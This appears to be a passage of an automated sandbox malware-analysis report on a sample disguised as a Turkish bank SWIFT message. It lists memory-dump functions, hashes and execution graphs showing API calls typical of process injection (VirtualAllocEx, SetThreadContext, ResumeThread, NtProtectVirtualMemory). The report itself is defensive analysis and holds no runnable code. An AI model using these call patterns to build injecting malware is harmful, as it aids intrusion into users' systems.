                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: f7ab078f8cb2a46232529c0e90759a0f61fc586bccdc69b7aab4194eb496e8b2
                                                                    • Instruction ID: b4400cc12660d6c01f1fec8193acd09ea84d5b19b94a9fab95d50e605d1e26c1
                                                                    • Opcode Fuzzy Hash: f7ab078f8cb2a46232529c0e90759a0f61fc586bccdc69b7aab4194eb496e8b2
                                                                    • Instruction Fuzzy Hash: 8C2116B19003599FCB00DFA9C884BEEBBF5FF48324F54882AE519A7240C775A954CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 363 71677f0-716783b 365 716783d-7167849 363->365 366 716784b-716787b SetThreadContext 363->366 365->366 368 7167884-71678b4 366->368 369 716787d-7167883 366->369 369->368
                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 0716786E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: 8cb52e54daf52c70461a843ad67b0db5c0e7a5165dbbb35238cde34160c3dc92
                                                                    • Instruction ID: e8ef6cf5181264bfa2d0966992c125bbb1a1afd8b58aadfc2e05593826bc8582
                                                                    • Opcode Fuzzy Hash: 8cb52e54daf52c70461a843ad67b0db5c0e7a5165dbbb35238cde34160c3dc92
                                                                    • Instruction Fuzzy Hash: B6213AB1D003198FCB10DFA9C4857EEBBF4EF88358F548429D519A7280C778A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 26abc10-26abcac DuplicateHandle 359 26abcae-26abcb4 358->359 360 26abcb5-26abcd2 358->360 359->360
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026ABC9F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 435d96c3b228a29373e011fe5a5635000dbc7976cf2d9b94d099b9bdefcb6809
                                                                    • Instruction ID: 03982822ebea3e567718999af25286e071176f8579efb3195b27a9a44685affc
                                                                    • Opcode Fuzzy Hash: 435d96c3b228a29373e011fe5a5635000dbc7976cf2d9b94d099b9bdefcb6809
                                                                    • Instruction Fuzzy Hash: BA2112B5900208EFCB10CFA9D984AEEFBF4FB48324F14841AE915A7310C379A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 026ABC9F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: f52b18ae24c803aeb8b0dc017ee9b0bae2b9e9c8b09f8f1098ffeedf5d1f8d19
                                                                    • Instruction ID: a04720bc9faeb5ce1a13dd7812ee519b9488443eb58342d15652dc6233ddc7be
                                                                    • Opcode Fuzzy Hash: f52b18ae24c803aeb8b0dc017ee9b0bae2b9e9c8b09f8f1098ffeedf5d1f8d19
                                                                    • Instruction Fuzzy Hash: E421E2B5900208AFDB10CFA9D984ADEBBF8EB48324F14841AE915A3310D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 19b1788adb9be4e83b374628a6bf001c4f566f155b11fa3fb06a9d3e6eb50c08
                                                                    • Instruction ID: cce5ac46d99554d90947b5af5705d71995381d9cf895123e20e0a3739f609779
                                                                    • Opcode Fuzzy Hash: 19b1788adb9be4e83b374628a6bf001c4f566f155b11fa3fb06a9d3e6eb50c08
                                                                    • Instruction Fuzzy Hash: AC1158B1D003598BCB14DFAAC848BEFFBF5AB88228F14881ED515A7640C775A945CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071679F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: c6fa3f2dd5d59d60659e66cdf5eaf3bedb4ab30b12e3eb482241df25957cd128
                                                                    • Instruction ID: 666c0361b7bd406671faffd651c4411c2fbb9109a19bf4e6d7ecb26b1daeaac6
                                                                    • Opcode Fuzzy Hash: c6fa3f2dd5d59d60659e66cdf5eaf3bedb4ab30b12e3eb482241df25957cd128
                                                                    • Instruction Fuzzy Hash: 901197729002599FCF10DFAAC848BEFBBF5EF88324F148819E525A7240C735A954CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,026A99B1,00000800,00000000,00000000), ref: 026A9BC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 31e9483d802b4cae52d61d803c99b6179d1acc6b2cc34b632b1aa3b45f6ccbd1
                                                                    • Instruction ID: 9b832a3b126f25d99a2a1413803dc8c58be2646539c4f57efa328a8fdff1bcf4
                                                                    • Opcode Fuzzy Hash: 31e9483d802b4cae52d61d803c99b6179d1acc6b2cc34b632b1aa3b45f6ccbd1
                                                                    • Instruction Fuzzy Hash: 3111D3B69052499FDB10CF9AC448BDEFBF5EB88314F14842ED515A7600C375A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,026A99B1,00000800,00000000,00000000), ref: 026A9BC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 403a66ad08600d15478f901f41ca493b54693dabea84d398659e5dc9e75e9a9c
                                                                    • Instruction ID: 3a9d69e917d1124fba7f930db933acaecd4e280dd5aac3223d62e208acc27ace
                                                                    • Opcode Fuzzy Hash: 403a66ad08600d15478f901f41ca493b54693dabea84d398659e5dc9e75e9a9c
                                                                    • Instruction Fuzzy Hash: 811100B29013498FCB10CF9AD444BDFFBF4AB88324F14842ED915AB600C375A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071679F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: af152d97a82e449835762fd55d32ff68e15982f37a4c5102e2f8b04986ed7d02
                                                                    • Instruction ID: 4299ffeb4547bb08b289d27a835a4f1081b8fcbd128157790eeb6b28c04d904e
                                                                    • Opcode Fuzzy Hash: af152d97a82e449835762fd55d32ff68e15982f37a4c5102e2f8b04986ed7d02
                                                                    • Instruction Fuzzy Hash: 731167719002599FCF10DFAAC848BDFBBF5EF88324F148819D515A7240C775A954CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 5fff3b63a7ae14ec835edf17c045e630f754ef812a27e47f5a989b0495f8b6a0
                                                                    • Instruction ID: 7964b6e64d62d4be671668284b5aebfef0a3d77e6b737cbe053ba13b5d4b3920
                                                                    • Opcode Fuzzy Hash: 5fff3b63a7ae14ec835edf17c045e630f754ef812a27e47f5a989b0495f8b6a0
                                                                    • Instruction Fuzzy Hash: 8A113AB1D043598BCB14DFAAC4487EEFBF4AB88328F148819C515A7640C775A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 026A9936
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 25753fdab76fc7038b8d7f4b13db4d3deac2f65d5e51184da10007e9bb8719cc
                                                                    • Instruction ID: 705d42c4f09452992f670938596f49088b88ad27543e5c5ad8af816cedb67dfd
                                                                    • Opcode Fuzzy Hash: 25753fdab76fc7038b8d7f4b13db4d3deac2f65d5e51184da10007e9bb8719cc
                                                                    • Instruction Fuzzy Hash: A811DFB6D012499FCB10CF9AC444BDEFBF4AB89324F14841AD869A7700D375A945CFA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261447918.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a3d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1019192c3470053945e51885b188ce7df72ea9c41d83583ac8827ce4f01f2680
                                                                    • Instruction ID: cc108b1a3b9fb2dcf7939727b5486c05725d4a2f883eb9a861593de3c7574beb
                                                                    • Opcode Fuzzy Hash: 1019192c3470053945e51885b188ce7df72ea9c41d83583ac8827ce4f01f2680
                                                                    • Instruction Fuzzy Hash: B521C1B2504340DFDB05DF94E9C4B6BBB76FB88314F2485A9F9054B246C336D826CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261506966.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a4d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c212dc7f13e1b68037d57ce810466530c165fc8f0a369ebb19c252e8b027387
                                                                    • Instruction ID: 94eceebb3e12ba29e7b97cf3b8a981bc6933811278e62211fbf15726af89814e
                                                                    • Opcode Fuzzy Hash: 1c212dc7f13e1b68037d57ce810466530c165fc8f0a369ebb19c252e8b027387
                                                                    • Instruction Fuzzy Hash: 192107B9604200EFDB05DF14D5C0B66BBA5FBC8314F24CA6DE9095B242C3B6DC46CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261506966.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a4d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 716040105e8abf7d75165be7b6629d7fbd8cbd6cd7184574a89d8c6f10490843
                                                                    • Instruction ID: e5e27f51d4d99cfab72ecc5d9fe357ff00b66543ecdf8d9af0852d0768285fb8
                                                                    • Opcode Fuzzy Hash: 716040105e8abf7d75165be7b6629d7fbd8cbd6cd7184574a89d8c6f10490843
                                                                    • Instruction Fuzzy Hash: BE21C279608240DFDB14DF24D9C4B26BB65FBC8314F24C9ADD90A4B246C37ADC57CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261447918.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a3d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6d1f1640b1e25b9ac51f62d5582d242d83aec357459782d678715058f9d6892d
                                                                    • Instruction ID: d7266c61ee0ea60b35ddea804261dba0dba6aa9c436033496677995ddc08088d
                                                                    • Opcode Fuzzy Hash: 6d1f1640b1e25b9ac51f62d5582d242d83aec357459782d678715058f9d6892d
                                                                    • Instruction Fuzzy Hash: 9521AF76504280DFCB06CF50D9C4B56BF71FB88314F24C6A9EC040B656C33AD86ACBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261506966.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a4d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3cd41a4061cc29d787fe51ebe36ce63623d75ca40e91f37174fdf6694bf1f564
                                                                    • Instruction ID: 24a1668f1b97bfcf3109ea8a75383b400279ba3742da442c15e579d4892401b4
                                                                    • Opcode Fuzzy Hash: 3cd41a4061cc29d787fe51ebe36ce63623d75ca40e91f37174fdf6694bf1f564
                                                                    • Instruction Fuzzy Hash: D0118B79504280DFCB15CF14D5C4B15BBA1FB88324F28C6AAD84A4B656C33AD84ACBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261506966.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a4d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3cd41a4061cc29d787fe51ebe36ce63623d75ca40e91f37174fdf6694bf1f564
                                                                    • Instruction ID: c339597f7140e813a3decff768483cc79225f4f7a8a0e8f13ca65ba30c2957f2
                                                                    • Opcode Fuzzy Hash: 3cd41a4061cc29d787fe51ebe36ce63623d75ca40e91f37174fdf6694bf1f564
                                                                    • Instruction Fuzzy Hash: DF119D79904280DFCB15DF10D5C4B55FBB1FB84324F28C6ADD8494B656C37AD84ACB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261447918.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a3d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0cf8d61cb5b66be3361ac7926ab410ddfa6d2a8126403b9646fac0179999546
                                                                    • Instruction ID: 5bedda07db6dfbe890a3ce7fa59e247a14debe96a17bd8ecc48fd50395907cca
                                                                    • Opcode Fuzzy Hash: f0cf8d61cb5b66be3361ac7926ab410ddfa6d2a8126403b9646fac0179999546
                                                                    • Instruction Fuzzy Hash: 7F01F771508380DBE7108F25DCC4B66BBE8EF41374F18C55AFD045A246C3799C40CAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261447918.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a3d000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c3f17517981eb8d72d833814752623995c71bf78043ac7d5f91f1371c7c3c95
                                                                    • Instruction ID: a8151d294635ee729eeba193cbcbd8eb3011aec2a8e1bf676960f1897e1e167b
                                                                    • Opcode Fuzzy Hash: 8c3f17517981eb8d72d833814752623995c71bf78043ac7d5f91f1371c7c3c95
                                                                    • Instruction Fuzzy Hash: 63F06271504394AEEB108F16DC84BA6FFD8EB81774F18C45AFD085B286C3799C44CAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d2a47f55422db8749d12c76d8c75b32f57b38926945cebad4fb25a307e9a869c
                                                                    • Instruction ID: 77f3c2b853198b59e3516ecc8e2ec91e294e5b7562fe2da95bb8ac28f64ef02e
                                                                    • Opcode Fuzzy Hash: d2a47f55422db8749d12c76d8c75b32f57b38926945cebad4fb25a307e9a869c
                                                                    • Instruction Fuzzy Hash: 6D12B9F1C917458BD314EF96ED981AD3B60B754318BE06A09D1633BAD0D7B421EACF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbb7c21b2ffb3c12977aa5bdc834da0271b0e9aa48d4415008fa63d5bcdaebfe
                                                                    • Instruction ID: 24d6e5c26d9be8d05d6b73b54c88ccb8c159e69077f66cb8b10fcdec1cb3c050
                                                                    • Opcode Fuzzy Hash: cbb7c21b2ffb3c12977aa5bdc834da0271b0e9aa48d4415008fa63d5bcdaebfe
                                                                    • Instruction Fuzzy Hash: 4CA15A32E002198FCF05DFA5C8549DEBBF2FF89304B15856AE805AB261EB31AD55CF80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.261858484.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_26a0000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 547f3872a1d6e245448c95e58719428769c55ceb70439ac0d02b7f5696867504
                                                                    • Instruction ID: 50a6d799e845458ddcfff5d43fb2ce15af95394c5a21e73a5da097f34da50d44
                                                                    • Opcode Fuzzy Hash: 547f3872a1d6e245448c95e58719428769c55ceb70439ac0d02b7f5696867504
                                                                    • Instruction Fuzzy Hash: 80C12FF1C517458BD314EFA6EC981AD3B61BB54318FA06A09D1623BAD0D7B430E9CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b2508817fa66d7884f4fa91f96ff7db52d920944cca956fca4273d4bbe4dc59
                                                                    • Instruction ID: b990b16ef970e802f98739cb405aea40bcf3defd054f47f6243afacd27aef694
                                                                    • Opcode Fuzzy Hash: 7b2508817fa66d7884f4fa91f96ff7db52d920944cca956fca4273d4bbe4dc59
                                                                    • Instruction Fuzzy Hash: 47414DB1E15A288BEB5CCF67CC4479AFAF7AFC9201F14C1B9840CA6255EB3049858F11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.282149902.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7160000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d65ef6e89f04a27b4903817b3867649222c14dd9afa1306019b6a184a1e5870
                                                                    • Instruction ID: d3c25ee1537cc769cffea81d8c3223ae2f45939cd706bc0aa762200904f581ee
                                                                    • Opcode Fuzzy Hash: 2d65ef6e89f04a27b4903817b3867649222c14dd9afa1306019b6a184a1e5870
                                                                    • Instruction Fuzzy Hash: 334104B1E11A188BEB5CCF6B8D4469AFAF7BFC9201F18C1BAD40CA6255EB3015858F11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:4.7%
                                                                    Dynamic/Decrypted Code Coverage:2.3%
                                                                    Signature Coverage:4.3%
                                                                    Total number of Nodes:654
                                                                    Total number of Limit Nodes:83
                                                                    execution_graph 31960 4014e9 31961 4014f0 NtProtectVirtualMemory 31960->31961 31963 401570 31961->31963 31966 422de7 31963->31966 31969 41f537 31966->31969 31970 41f55d 31969->31970 31983 40b327 31970->31983 31972 41f569 31982 40157b 31972->31982 31991 40f567 31972->31991 31974 41f57e 31977 41f591 31974->31977 32003 40f527 31974->32003 31978 41f5a6 31977->31978 32044 41e1c7 31977->32044 32008 40d157 31978->32008 31980 41f5b5 31981 41e1c7 2 API calls 31980->31981 31981->31982 31984 40b334 31983->31984 32047 40b277 31983->32047 31986 40b33b 31984->31986 32059 40b217 31984->32059 31986->31972 31992 40f593 31991->31992 32478 40c7d7 31992->32478 31994 40f5a5 32482 40f437 31994->32482 31997 40f5c0 31999 40f5cb 31997->31999 32001 41dfa7 2 API calls 31997->32001 31998 40f5d8 32000 40f5e9 31998->32000 32002 41dfa7 2 API calls 31998->32002 31999->31974 32000->31974 32001->31999 32002->32000 32004 40f546 32003->32004 32005 418a77 LdrLoadDll 32003->32005 32006 40f54d 32004->32006 32007 40f54f GetUserGeoID 32004->32007 32005->32004 32006->31977 32007->31977 32009 40d17c 32008->32009 32010 40c7d7 LdrLoadDll 32009->32010 32011 40d1d3 32010->32011 32501 40c457 32011->32501 32013 40d1f9 32043 40d44a 32013->32043 32510 417f97 32013->32510 32015 40d23e 32015->32043 32513 409527 32015->32513 32017 40d282 32017->32043 32535 41e017 32017->32535 32021 40d2d8 32022 40d2df 32021->32022 32547 41db27 32021->32547 32024 41fa27 2 API calls 32022->32024 32026 40d2ec 32024->32026 32026->31980 32027 40d329 32028 41fa27 2 API calls 32027->32028 32029 40d330 32028->32029 32029->31980 32030 40d339 32031 40f5f7 3 API calls 32030->32031 32032 40d3ad 32031->32032 32032->32022 32033 40d3b8 32032->32033 32034 41fa27 2 API calls 32033->32034 32035 40d3dc 32034->32035 32553 41db77 32035->32553 32038 41db27 2 API calls 32039 40d417 32038->32039 32039->32043 32558 41d937 32039->32558 32042 41e1c7 2 API calls 32042->32043 32043->31980 32045 41eae7 LdrLoadDll 32044->32045 32046 41e1e6 ExitProcess 32045->32046 32046->31978 32078 41c6d7 32047->32078 32051 40b29d 32051->31984 32052 40b293 32052->32051 32085 41ee97 32052->32085 32054 40b2da 32054->32051 32096 40b0b7 32054->32096 32056 40b2fa 32102 40ab27 LdrLoadDll 32056->32102 32058 40b30c 32058->31984 32453 41f187 32059->32453 32062 41f187 LdrLoadDll 32063 40b242 32062->32063 32064 41f187 LdrLoadDll 32063->32064 32065 40b258 32064->32065 32066 40f327 32065->32066 32067 40f340 32066->32067 32461 40c657 32067->32461 32069 40f353 32465 41dcf7 32069->32465 32073 40f379 32076 40f3a4 32073->32076 32471 41dd77 32073->32471 32075 41dfa7 2 API calls 32077 40b34c 32075->32077 32076->32075 32077->31972 32079 41c6e6 32078->32079 32103 418a77 32079->32103 32081 40b28a 32082 41c587 32081->32082 32109 41e117 32082->32109 32086 41eeb0 32085->32086 32116 418667 32086->32116 32088 41eec8 32089 41eed1 32088->32089 32155 41ecd7 32088->32155 32089->32054 32091 41eee5 32091->32089 32172 41da17 32091->32172 32099 40b0d1 32096->32099 32431 408917 32096->32431 32098 40b0d8 32098->32056 32099->32098 32444 408bd7 32099->32444 32102->32058 32104 418a85 32103->32104 32105 418a91 32103->32105 32104->32105 32108 418ef7 LdrLoadDll 32104->32108 32105->32081 32107 418be3 32107->32081 32108->32107 32112 41eae7 32109->32112 32111 41c59c 32111->32052 32113 41eaf6 32112->32113 32115 41eb6c 32112->32115 32114 418a77 LdrLoadDll 32113->32114 32113->32115 32114->32115 32115->32111 32117 4189aa 32116->32117 32119 41867b 32116->32119 32117->32088 32119->32117 32180 41d767 32119->32180 32121 4187ac 32183 41de77 32121->32183 32122 41878f 32240 41df77 LdrLoadDll 32122->32240 32125 418799 32125->32088 32126 4187d3 32127 41fa27 2 API calls 32126->32127 32130 4187df 32127->32130 32128 41896e 32131 41dfa7 2 API calls 32128->32131 32129 418984 32249 418387 LdrLoadDll NtReadFile NtClose 32129->32249 32130->32125 32130->32128 32130->32129 32135 418877 32130->32135 32132 418975 32131->32132 32132->32088 32134 418997 32134->32088 32136 4188de 32135->32136 32138 418886 32135->32138 32136->32128 32137 4188f1 32136->32137 32242 41ddf7 32137->32242 32140 41888b 32138->32140 32141 41889f 32138->32141 32241 418247 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32140->32241 32144 4188a4 32141->32144 32145 4188bc 32141->32145 32186 4182e7 32144->32186 32145->32132 32198 418007 32145->32198 32147 418895 32147->32088 32149 418951 32246 41dfa7 32149->32246 32150 4188b2 32150->32088 32153 4188d4 32153->32088 32154 41895d 32154->32088 32157 41ecf2 32155->32157 32156 41ed04 32156->32091 32157->32156 32267 41f9a7 32157->32267 32159 41ed24 32270 417c57 32159->32270 32161 41ed47 32161->32156 32162 417c57 3 API calls 32161->32162 32164 41ed69 32162->32164 32164->32156 32302 418fb7 32164->32302 32165 41edf1 32166 41ee01 32165->32166 32397 41ea67 LdrLoadDll 32165->32397 32313 41e8d7 32166->32313 32169 41ee2f 32392 41d9d7 32169->32392 32173 41eae7 LdrLoadDll 32172->32173 32174 41da33 32173->32174 32425 18d967a 32174->32425 32175 41da4e 